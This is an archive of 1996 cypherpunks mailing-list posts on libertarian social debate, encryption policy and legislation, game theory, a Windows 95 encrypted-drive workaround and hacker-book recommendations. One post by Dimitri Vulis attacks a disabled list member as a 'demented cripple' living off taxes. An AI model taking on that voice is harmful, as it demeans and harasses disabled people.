> tcmay@got.net wrote:
> >Who takes responsibility when people fail to save enough of their
> >paycheck to last them through the month? Who takes responsibility when
> >people drink too much, miss work, and are fired? And so on.
> 
> One common thread in many of these discussions is the ease with which moral
> judgements are made about the situation: "fail to save", "drink too much".

Uhh, "fail to save" isn't a moral judgement; it's an observable 
phenomenon.  Either somebody does save money or they don't.  I
don't see in Tim's wording any judgement being made.  It's a 
numerical thing.

If you replace "drink too much," with "drink enough that they", you
get another observable phenomenon.


______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fred <admin@dcwill.com>
Date: Tue, 30 Jul 1996 12:45:23 +0800
To: cypherpunks@toad.com
Subject: Re: Parsing JYA; now others?
In-Reply-To: <199607292236.SAA31701@yakko.cs.wmich.edu>
Message-ID: <199607300114.SAA06363@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Say, Duncan - you can do John Young, but can you make any sense of this?

> Approved for your convenience, in sterile jello molds.  The Lawnboy
> nods assent.

> The sun, a gaseous ball of tomato paste and model trains, is lost

> among clouds of thankfullness.

> Response time is minimal.  Lost among oceans of billiard balls made of
> styrofoam - tiny marmots build complicated nests of velveeta.

Sounds like the lyrics to a YES song to me. Compare the styles:

"The silhouette 
will charge the view
of distant atmospheres."

Fred  <admin@dcwill.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 30 Jul 1996 09:57:06 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: A Libertine Question
Message-ID: <9606298386.AA838689552@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


I find it funny that I'm considered Conservative by most people who know me.
Your opinion may vary. ;-)

tcmay@got.net wrote:
>Who takes responsibility when people fail to save enough of their
>paycheck to last them through the month? Who takes responsibility when
>people drink too much, miss work, and are fired? And so on.

One common thread in many of these discussions is the ease with which moral
judgements are made about the situation: "fail to save", "drink too much".

I know the social psychology explanation that people who view the world as
ordered attach these types of judgements to situations which violate their
ordered view of the world. "She was just asking for it dressed like that..."

However, now I'm puzzled. From what I've read of Tim May, he does not hold such
an orderly view of the world. The "rules" of existence may prove to be
deterministic, but the results are chaotic. So Tim, where are these moral
judgments coming from? 

>The issue of "who takes care of" people who can't hold their liquor, or
>who overeat, or who smoke too much, does not enter into the equation. 

Think of how many of our laws are being enacted that tacitly make being  poor or
indigent a crime. Curfews being a recently discussed example. If the equation is
one of economics, then "who takes care of" people does indeed enter the
equation. I suggest that it is more economical to provide for a minimum quality
of life- if only as a form of insurance for myself. Think: Rawls. 

The alternative is to have garbage collectors to "take care of" those that fall
behind. Think: Soylent Green.

Better twisted than bitter, as Tiny Tim Cratchet used to say.

James






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 30 Jul 1996 09:41:23 +0800
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: Secure drive?
Message-ID: <2.2.32.19960729222333.008ca220@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>I assume that when you say that "it does", this means that I can access the
>encrypted drive from Win95.  If so, can you tell me how.  I have a 50mb
>partition that's encrypted and if I boot to DOS everything works perfectly,
>but from Win95, the drive is always encrypted.  I've tried entering my
>passphrase prior to Win95 loading... no effect.  If I try to enter my pp
>from a DOS box, it says that the SECTSR isn't loaded, but MEM says that it
>is.  Any thoughts?


Sort of.  Open "Control Panel."  Open "System."  Click the "Performance"
tab.  Click the <V>irtual Memory radio button.  Check/select "Let <m>e
specify my own virtual memory settings."  Check Di<s>able virtual memory
(not recommended).  Click the "OK" radio button.  Ignore the warning dialog
box which appears and click "Yes."  Reboot WIN95 and your encrypted
partition should be accessible (if you log into it under DOS before loading
Windows), and all your drives will be operating at 16-bit speeds.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jul 1996 12:13:37 +0800
To: cypherpunks@toad.com
Subject: Clinton must like terrorists...
Message-ID: <199607300127.SAA25730@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Clinton must like terrorists... because his most recent proposals will end 
up making more of them.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 30 Jul 1996 12:19:22 +0800
To: cypherpunks@toad.com
Subject: Re: call your rep
In-Reply-To: <clzBmwK00iWP44NGUO@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.960729182341.25048A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


While phone calls can't hurt, this markup ain't gonna happen this week. 
This from Burns' remarks at Cato this morning and reports from committee
staffers. 

In fact, in the wake of the recent bombing it may be better *not* to push
for a markup this week that would result in a narrow vote along partisan
lines. That would bode ill for the bill's future on the floor. 

-Declan





> >>the Senate commerce committee held its final
> >>hearing on Burns's bill yesterday with the appearance
> >>of FBI Director Freeh and Bill Reinsch at Dept of Commerce.
> >>The Senate committee would like to hold a mark-up on
> >>the bill (Pro-CODE) next week, but lack the certain votes of the members
> >>of the committee to do so.
> >>
> >>Expressions of support for S. 1726 to critical Democrats
> >>and Republicans are needed--especially:
> >>  Olympia Snowe, R-Maine, 224-5344; Bill Frist, R-Tennessee
> >>224-3344; Spencer Abraham, R-Michigan 224-4822; Ernest
> >>Hollings, D-South Carolina, 224-6121; Daniel Inouye D-Hawaii
> >>224-3934; Wendell Ford D-Kentucky 224-4343; James Exon,
> >>D-Nebraska 224-4224; Jay  Rockefeller D-West Virginia 224-6472;
> >>John Kerry D-Massachusetts 224-2742; John Breaux D-Louisiana
> >>224-4623; Richard Bryan D-Nevada 224-6244; Byron Dorgan
> >>D-North Darkota 224-2551.
> >>
> >>Calls are needed by Tuesday in order to schedule the mark-up.
> >> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 30 Jul 1996 12:14:55 +0800
To: "'cypherpunks@toad.com>
Subject: RE: A Libertine Question
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960730013423Z-18393@inet-01-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	jbugden@smtplink.alis.ca
>
>In this context, right and wrong do not need to enter the discussion.
>[. . .]
>So, how do *we* get crypto widespread?
...............................................................


Interest in crypto will spread when everyone's files are by law made
available to anyone working in a government agency and people begin to
get this growing feeling that there is something terribly wrong. . . .

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 30 Jul 1996 09:54:47 +0800
To: cypherpunks@toad.com
Subject: Parsing JYA; now others?
Message-ID: <199607292236.SAA31701@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


Say, Duncan - you can do John Young, but can you make any sense of this?

>From: doghead@psyclone.com (Blowjob Jesus)
Newsgroups: news.admin.net-abuse.misc,news.admin.misc
Subject: Re: ! Blacklist Spammers and Rogue ISP's !!!!!!!!!!
Date: Thu, 25 Jul 1996 01:08:56 GMT
Organization: The Mighty Psyclone - Gonna Blow Yer Mind
Lines: 56
Message-ID: <31f6c6d2.439333@news.alpha.net>
References: <4t59aq$3n0@park.interport.net>
Reply-To: doghead@psyclone.com
NNTP-Posting-Host: 156.46.104.253
X-Newsreader: Forte Agent .99e/32.227

On Wed, 24 Jul 96 13:41:28 GMT, tonyb(remove this garbage to email
me)@interport.net (tony brower) wrote:

>Conventional response to spam is completely ineffective.

Farflung was the offense, easy is the time spent drinking salad
dressing.  Christian Dior, well-known parking ticket, adds his pickle
fork.

>Nothing currently prevents the abuser from getting another account in
>another name and continuing the practise.

Wendigo spake in gruff pebbles, like unto a Timex!  Reginald Denny
left the room with scanners on full auto.

>Even ISP's spam their adverts across newsgroups.

Freedom, paged in 4k chunks, permeates UDP.  There never was a
governor.  The double nickle blowed up good.

>Why can't people who spam and otherwise abuse Usenet for commercial purposes
>be blacklisted?

Approved for your convenience, in sterile jello molds.  The Lawnboy
nods assent.

>e.g. after first warning, no more accounts allowed from that Credit Card or
>other payment source.

The sun, a gaseous ball of tomato paste and model trains, is lost

among clouds of thankfullness.

>Why can't providers who refuse to curtail abuse from their customers also be
>blacklisted and shut out from the net?
>e.g. If ISP's are held responsible for abuse by their customers they'll
>enforce nettiquette ("abide by the rules or lose your account here and
>anywhere for one year").  Irresponsible ISP's will lose customers to those
>ISP's who care.  Hell, let them make their own net for cycling and recylcing
>commercial, make money fast and sex #'s posts.

OJ Simpson skirvined the net and was clarified.  When failed and not
sanguine, there was no response to the 'sturm und drang.'

>Isn't this the fastest way to clean out all the junk that has permeated the
>newsgroups posted by inconsiderate, greedy assholes (who have NOTHING to fear
>by conventional response)?

Response time is minimal.  Lost among oceans of billiard balls made of
styrofoam - tiny marmots build complicated nests of velveeta.

Regroup?

--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 30 Jul 1996 12:37:52 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: game theory
Message-ID: <Pine.SUN.3.95.960729183503.27103A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I agree with Tim that game theory is very interesting and a potentialy
useful tool in cryptography.  However, game theory currently has a major
limitation.  An even moderately complex game is likely to have a
very large set of equilibria (possible solutions where none of the players
will deviate from their strategy if they knew the strategy of all other
players).  It takes a lot of work to calculate the equilibria set, and
even if this is done, game theorists are hard pressed to explain or
predict which equilibrium is the actual outcome.

I have not read any of Schelling's work, but the notion of Schelling
points seems to be closely connected to that of equilibria in game theory.
If this is the case, then I don't see how it can be usefully applied to
the complex interactions of an entire society.  It is easy to say that
current social conventions are an equilibrium in some game, but how much
is this worth?  What we would like to know is what is the entire set of
possible equilibria, why we are in one of them (instead of the others),
and how changes in the game (such as introduction of strong crypto) change
that set.  I find it unlikely that game theory will soon advance to such a
state that it will give us the answers to these questions.

Wei Dai

P.S.  Now that I've reread Tim's original messages, I realize that maybe
Schelling points are not really the equilibria of game theory.  If this is
the case, Tim, can you please clarify its actual meaning?  (Perhaps by
quoting a definition from Schelling's book?)

ObCrypto: Here is a simple cryptographic application of game theory.  A
fair exchange protocol allows two parties to reveal valuable secrets to
each other one bit at a time.  Modeled as a game, it goes like this:

There are N (an even number) rounds.  On odd rounds Alice decides whether
to reveal a bit to Bob or to stop the game.  On even rounds Bob decides
whether to reveal a bit to Alice or to stop the game.  The goal is to get
as many bits as possible and secondarily to reveal as few bits as
possible.

Now using backwards inductions, we can show that the only subgame perfect
equilibrium of this game is that Alice stops the game in round 1.  The
analysis goes like this: on the last round (if the game goes that far) Bob
will have gotten all of the bits from Alice, so it makes no sense for him
to reveal his last bit to Alice.  On the next to last round, Alice knows
that even if she reveals her bit, she cannot get Bob's last bit, therefore
she would stop on that round.  Therefore Bob would stop on round N-2, and
on it goes.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Tue, 30 Jul 1996 10:08:36 +0800
To: cypherpunks@toad.com
Subject: Re: Just some comments on what I've read here
Message-ID: <960729184944_587677685@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-07-29 18:28:06 EDT, you write:

> It won't be that expensive...lesse....my WAN, for about 5000
>  people and 15000 machines, only runs me about $400,000 US
>  per month.  That's just circuit charges, of course... doesn't 
>  include any of the networking equipment or cost of the
>  machines....is this a troll or what?
>  
I dunno, are you a nob?

As I recall I said the expenses where going to be in the switches (or public
networks).

Plus I'm thinking the most basic services of telnet, ftp, smtp, and some
nnp...

Plug two network boards (whether ethernet or X.25 or ATM) into a UNIX
computer and you have a router.

You cannot tell me that hardware (minus the hardcore ATM/X.25 stuff) is not
inexpensive enough to put something together.  At least for a few thousand
users all sophisticated enough to know how to install a UNIX or Linux
system... I'm talking about a club here - not a replacement for the internet.

Open up your mind, dude....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 30 Jul 1996 10:34:55 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: A Libertine Question
In-Reply-To: <9606298386.AA838693723@smtplink.alis.ca>
Message-ID: <31FD4FA8.6DF6@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:

> As is the observable phenomenon that some people focus on the details 
> and miss the point. You may also consider this to be a moral judgement.

I'm sorry, but this thread is making no sense.

You wondered aloud why Tim would make moral judgements; I claim he
didn't.  What exactly was it you were trying to say?

> To argue that the cited examples - out of the universe of possible 
> examples -

- that you clearly have in stock as ready-to-use straw men -

> did not imply a moral judgement is an argument useful only for its 
> humour.

So you're saying that you made a response to Tim questioning his use
of moral judgements just to introduce your own moral judgement?

If you want to issue moral pronouncements ex cathedra, why not just start
a new thread instead of couching them in a confusing response?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 30 Jul 1996 10:13:59 +0800
To: cypherpunks@toad.com
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <v0151010aae22d08b4c0e@[204.62.128.229]>
Message-ID: <3aouRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


declan@well.com (Declan McCullagh) writes:

> Feinstein today introduced an amendment revisiting her 1995 net-censorship
> amendment tacked onto the anti-terrorism bill. Seeks to ban bomb-making
> info from the Net and is being marketed in those words, but is not
> Net-specific.

So, is she going to shut down the CNN Web site with bomb-making info?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 30 Jul 1996 10:16:19 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: RE: A Libertine Question
Message-ID: <9606298386.AA838693723@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally <m5@vail.tivoli.com> wrote:
>Uhh, "fail to save" isn't a moral judgement; it's an observable 
>phenomenon.  Either somebody does save money or they don't.  I
>don't see in Tim's wording any judgement being made.  It's a 
>numerical thing.

>If you replace "drink too much," with "drink enough that they", you
>get another observable phenomenon.

As is the observable phenomenon that some people focus on the details and miss
the point. You may also consider this to be a moral judgement.

To argue that the cited examples - out of the universe of possible examples -
did not imply a moral judgement is an argument useful only for its humour.

James








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Tue, 30 Jul 1996 10:39:25 +0800
To: cypherpunks@toad.com
Subject: New Internet
Message-ID: <960729192528_587706324@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-07-29 19:16:30 EDT, you write:

> Any sort of dialup service is pretty much going to
>  limit you to store-and-forward items.  Any full-time
>  links attempting to mesh "a few thousand" 
>  users is going to quickly exceed my paltry $400K.

I agree... but I am also thinking that not one person is picking up the tab.

Undoubtedly some systems are going to go up and down also... so - at the
beginning - it could be like fidonet.  But hopefully it would be more than a
bunch of machines calling each other up an bursting information, some may
backbone for a while.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 30 Jul 1996 05:28:02 +0800
To: "'cypherpunks@toad.com>
Subject: Re: e$: The Demographic "Transaction" (was Re: Schelling  Points...)
Message-ID: <01BB7D85.BA386100@groningen06.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain



At monday 29 july, Arun Mehta wrote:


>As I see it, having more children makes sound economic sense when
>you have child labor. You feed the child for 4-5 years, after
>which it contributes financially to the family for the rest of
>its short life. More stringent enforcement of anti child-labor
>legislation would help. Increase in life expectancy is also good,
>because then you need fewer children as insurance.

The only effect of more stringent enforcement of anti child-labor legislation is to harm the children involved. You may think that the millions of families in Third World countries who are too poor to provide for their children, will be magically become rich enough to send their children to school once the anti child-labor legislation will be enforced. This is not the case. When the factories don't want the children anymore because of the government regulations, the children will simply be working in other places - at home, in the streets. And this is work that pays less. 
	Child labour in the West didn't stop because of anti child-labour laws; it stopped the moment the people became rich enough to provide for their children, thanks to the capitalist revolution in the 18th & 19th century. The same path will have to be followed by the Third World countries today.

>The spread of the Internet, and the ability to post anonymously
>should help in exposing instances of violation of child-labor
>laws, and increasing outrage. Hopefully, it will also make it
>easier to spread literacy, which is arguably the best way to keep
>population down.

Instead of posting to the net to increase outrage about the violations of harmful child labour laws, you better begin posting to the net to increase outrage about the socialist governments in the Third World that keep their populations in poverty.
	 I suggest you read the books of C. Nardanelli: 'Child labour and the industrial revolution' , and F. Hayek (ed): 'Capitalism and the historians'.

Bart

bart.croughs@tip.nl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 30 Jul 1996 13:25:32 +0800
To: Duncan Frissell <tcmay@got.net (Timothy C. May)
Subject: RE: A Libertine Question
Message-ID: <199607300242.TAA05651@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:13 PM 7/29/96 -0400, Duncan Frissell wrote:
>Perhaps the communitarians in the audience will have to fall back on
>disfellowship as the ultimate sanction (like the early Christians).  They
>won't be able to apply any more advanced weaponry.

Just as the ultimate net sanction is excommunication (usually via the ISP,
killfiles etc.), the ultimate communitarian sanction is shunning.  Anything
more takes force, and government reserves the use of force to itself.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 30 Jul 1996 10:42:24 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: e$: The Demographic "Transaction"
Message-ID: <9606298386.AA838695422@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:
>Let them eat cake.

Earlier, in: Re: "Soft Targets" as Schelling Points
tcmay@got.net (Timothy C. May) wrote:
>Keep your head down.

Are you consciously trying to compare yourself with Marie Antoinette? 
With so many sans-culottes around, you could succeed.

I'd rather be left than dead right.

James










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 30 Jul 1996 11:38:15 +0800
To: tcmay@got.net (Timothy C. May)
Subject: RE: A Libertine Question
Message-ID: <2.2.32.19960730001300.008c4c28@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:19 PM 7/29/96 EST, jbugden@smtplink.alis.ca wrote:
>I suggest that it is more economical to provide for a minimum quality
>of life- if only as a form of insurance for myself. Think: Rawls. 
>
>The alternative is to have garbage collectors to "take care of" those that fall
>behind. Think: Soylent Green.
>
>Better twisted than bitter, as Tiny Tim Cratchet used to say.
>
>James

But many of us believe that coercive "solutions" to life's problems whether
right or wrong are no longer possible because technology is in the process
of making individuals and small groups "ungovernable" by force.  If this is
true, whatever the morality of coercive solutions, they will not be able to
be applied to the real world.  

Thus if we designed the Internet (Ver.6) rather than Louis Freeh, his
opinion of our design is meaningless.

Perhaps the communitarians in the audience will have to fall back on
disfellowship as the ultimate sanction (like the early Christians).  They
won't be able to apply any more advanced weaponry.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 30 Jul 1996 11:30:33 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: International Standards
Message-ID: <199607300016.UAA17971@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Jul 96 at 6:38, Duncan Frissell wrote:

> Mr. Freeh, 
[..]
>    clearly impossible -- but to prevent such high-level code 
>    from becoming the international standard, with architecture 
[..]
> Looks like the fibbies (FBI) haven't been reading the "Proceedings of the
> IETF".  Strong crypto is already an international standard.

Methinks they regard as international standards what's built into 
something like MacOS or Windows.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 30 Jul 1996 11:01:56 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: RE: A Libertine Question
Message-ID: <9606298386.AA838696773@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:
>The issue of "who takes care of" people who can't hold their liquor, or who
overeat, or who smoke too much, does not enter into the equation.

Perhaps the judgemental tone of these descriptions are clearer to you.

Mike McNally <m5@vail.tivoli.com> wrote:
>So you're saying that you made a response to Tim questioning his use
of moral judgements just to introduce your own moral judgement?

Tim can and does make moral judgements. So do I. So do you.

I was curious as to why Tim brought them into an argument that did not need
moral judgements to make its point.

I suspect that it is more reflexive than carefully thought out, and I think may
reflect on some of his core assumptions about society in general.

But I don't know, so instead of making my own assumptions, I asked.

James

Feel free to respond by private e-mail. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jul 1996 14:07:28 +0800
To: cypherpunks@toad.com
Subject: Re: Denning vs. Gilmore
Message-ID: <199607300322.UAA02252@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:14 PM 7/29/96 +0100, Roderick Simpson wrote:
>Today, Monday, July 29, Dorothy Denning begins her debate vs. John Gilmore
>over The Absolute Right to Privacy on Wired Online's Brain Tennis site. Do
>citizens of the world have an "unalienable right" to privacy - or are there
>reasons why governments ought to have access to our communications? This
>debate will run daily through August 7. Follow along at
>http://www.wired.com/braintennis/. To get into the debate yourself, go to:
>
>http://www.hotwired.com/cgi-bin/interact/replies_all?msg.21655
>
>An excerpt of Dorothy's first post today:
>
>     "I'm not ready to accept 'the cat is out of the bag.'

The Wicked Witch of the East wasn't "ready to accept" a house being dropped 
on her.  Denning's personal desires are equally irrelevant.


>     Let's look for a way of enjoying
>     the benefits of encryption without
>     unnecessarily hindering the ability of law
>     enforcement to perform its mission. 


I consider the primary benefit of good encryption to be the "hindering the 
ability of law enforcement to perform" the particularly abusive "mission" 
they've chosen for themselves.

>     Let's use encryption for privacy, but also give
>     law enforcement access to communications and
>     computer files when there is probable cause
>     and a judge has issued a court order.

Many if not most of us out here believe that the ("probable cause") system 
is abusive, and has all the prospects of continuing to be abusive in the 
future.


>      In some cases, that access must be
>     surreptitious. 

But some of us consider such access to be unconstitutional, however "useful" 
you may believe it to be.  In the past, the government has had the extreme 
luxury of not being forced to convince the public of its "right" to wiretap. 
 Now, the advance of technology is forcing the question of such approval to 
be answered, and the Denning-types are getting really worried that the 
public isn't going to give that approval.  Tough!

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 30 Jul 1996 11:41:13 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: RE: A Libertine Question
Message-ID: <9606298386.AA838698411@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell <frissell@panix.com> wrote:
>But many of us believe that coercive "solutions" to life's problems whether
>right or wrong are no longer possible because technology is in the
>process of making individuals and small groups "ungovernable" by force.  

Basically, I agree. But as earlier essays have suggested, our current government
may just be a Schelling point of sorts among the possible social organizations
that can exist. Thus, technology is mearly a different lens to view the same
basic interaction among players. The players may move into different equivalence
classes, but the basic roles are the same.

In other times, alphabets, industrialization, and nuclear weapons could have
played similar roles in the upsetting of the status quo.

In this context, right and wrong do not need to enter the discussion.

However, optimizing each individual's situation does not necessarily result in
an optimal situation for the group. This is the basis of the classic prisoner's
dilemna from game theory. I understand that for the iterated version,
Tit-for-Tat is a stable strategy in that no other strategy will do better and
thereby displace it over time in a large population.

Tit-for-Tat: Start co-operating. Co-operate if the other party co-operated on
the last round. Defect if they defected on the last round.

So, how do *we* get crypto widespread?

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 30 Jul 1996 13:23:27 +0800
To: cypherpunks@toad.com
Subject: Re: Questions...
In-Reply-To: <96Jul29.145711edt.20482@janus.algorithmics.com>
Message-ID: <LLVuRD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Robin Powell <rpowell@algorithmics.com> writes:
> PS: For the record, I find that Dimitri often has interesting things
> to say.  I just wish he'd stop talking about wheelchairs and
> vegetables.  Makes me get sad (I broke my back and almost ended up in
> a wheelchair, but I'm much better now) and hungry (I'm a vegetarian)
> at the same time.

This reminds me of another mine-flame war I recently had on another forum
with a vegetarian who claimed that vegetarian airplane food is much worse
than airplane meat. He never tried the latter, so he just assumed it must be
better, and so poor vegetarians were being discriminated against. I found it
funny because so many people (including myself) ask for vegetarian food
when flying because their meat is usually even worse.

Likewise, Robin opens his (or her? this is a gender neutral name) big mouth
without knowing what the fuck s/he's talking about - and makes himself/
herself look like a complete idiot, comparable to "Dr." David Sternlight.

We have one demented cripple on this mailing list whose agenda is centered
around silencing everything he doesn't agree with. He keeps whining about
anonymous remailers which permit "homophobes" to get away with posting
their crimethoughts. He threatens to sue everyone who badmouths his meal
ticket - the wheelchair. Our taxes pay for his wheelchair, his Internet
access, his apartment, his welfare check... Disgraceful.

Unless you're a fascist, you shouldn't identify with this demented cripple.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Tue, 30 Jul 1996 12:28:44 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: what's a weapon? (fwd)
Message-ID: <199607300157.VAA12459@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 13:33 96.07.29 -0400, David Lesher wrote:
>------- Forwarded Message
>
>Drawing an analogy with encryption and US ITAR, a poster reported that
>A piper is being taken to court for practicing on Hampstead Heath,
>which has a by-law forbidding music. Mr Brooks, the piper, has denied
>the charge. He claims he wasn't playing a musical instrument, but
>practicing with a weapon. In 1746 in England, bagpipes were declared to
>be instruments of war, not musical weapons, and a subsequent Act of
>Parliament specifically stated that they were weapons.
>
>>

    If you have ever heard the pipes being practiced you'll know why.
Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Allen Robinson" <sebago@earthlink.net>
Date: Tue, 30 Jul 1996 14:31:29 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks vs hacker
Message-ID: <199607300355.UAA29837@andorra.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


On 29 Jul 96 at 6:06, pjn@nworks.com wrote:
(in response to Tim's suggestion that:)

>  In> Rather than debate semantics of the definition of "hacker," or ask
>  In> others to suggest definitions, it might be better for interested folks
>  In> to read some of the various books on the topic and then decide for
>  In> themselves. Some of them are:
> 
>  In> - Levy, "Hackers," of course
> 
>    Very good history.
> 
>  In> - Haffner and Markoff, "Cyberpunk" 
> 
>  In> - Sterling's book on hackers
> 
>    Hacker Crackdown.
> 
>  In> - any one (but not more) of the several Shimomura v. Mitnick books
> 
>    I think that Markoffs book on the incident was written beter then the 
>    rest.
> 
>    I might also suggest:
> 
>    - Masters of Deception
> 
>    - The Cuckoos Egg by Stoll
> 

Not to unduly belabor this, but I quite recently discovered another,
somewhat less widely known book on the subject.  _Approaching
Zero_ by Paul Mungo & Bryan Clough.  I've only skimmed it, but
my 11 year-old son has promised to lend it to me when he finishes
reading it.

AR

#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%
"In the end, more than they wanted freedom, they wanted
security.  When the Athenians finally wanted not to give to
society but for society to give to them, when the freedom
they wished for was freedom from responsibility, then Athens
ceased to be free."  - Edward Gibbon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allen Robinson.........................sebago@earthlink.net
PGP public key FE4A0A75
fingerprint 170FBC1F7609B76F 967F1CC8FCA7A41F
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Tue, 30 Jul 1996 15:46:39 +0800
To: cypherpunks@toad.com
Subject: Bush administration DT/Clipper strategy
Message-ID: <199607300503.WAA17737@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


This redacted and declassified high level memo outlining the linkage of
the Digital Wiretap bill and the Clipper initiative in the Bush
administration was recently obtained by EPIC (http://www.epic.org) as the
result of an FOIA request.

